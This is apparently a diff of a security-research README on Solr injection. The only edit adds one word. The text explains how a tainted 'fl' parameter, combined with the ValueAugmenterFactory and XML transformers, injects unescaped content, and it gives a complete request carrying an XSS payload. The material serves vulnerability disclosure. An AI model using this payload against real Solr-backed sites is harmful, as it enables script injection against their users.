veracode-research/solr-injection/README.md

 `GET /solr/db/select?q=Apple&fl=name,price`

 When this parameter is tainted, we can leverage the [ValueAugmenterFactory](https://lucene.apache.org/solr/guide/6_6/transforming-result-documents.html#TransformingResultDocuments-_value_-ValueAugmenterFactory) **(fl=name:[value v='xxxx'])** to inject additional fields to the document, and specify the injected value ('xxxx') right inside the query.
-Moreover, in conjunction with Xml Transformer **(fl=name:[xml])** we can parse the provided value on the server side and include it to the result document without escaping.
+Moreover, in conjunction with the Xml Transformer **(fl=name:[xml])** we can parse the provided value on the server side and include it to the result document without escaping.
 This technique may be used for XSS for example:

 `GET /solr/db/select?indent=on&q=*&wt=xml&fl=price,name:[value+v='<a:script+xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>'],name:[xml]`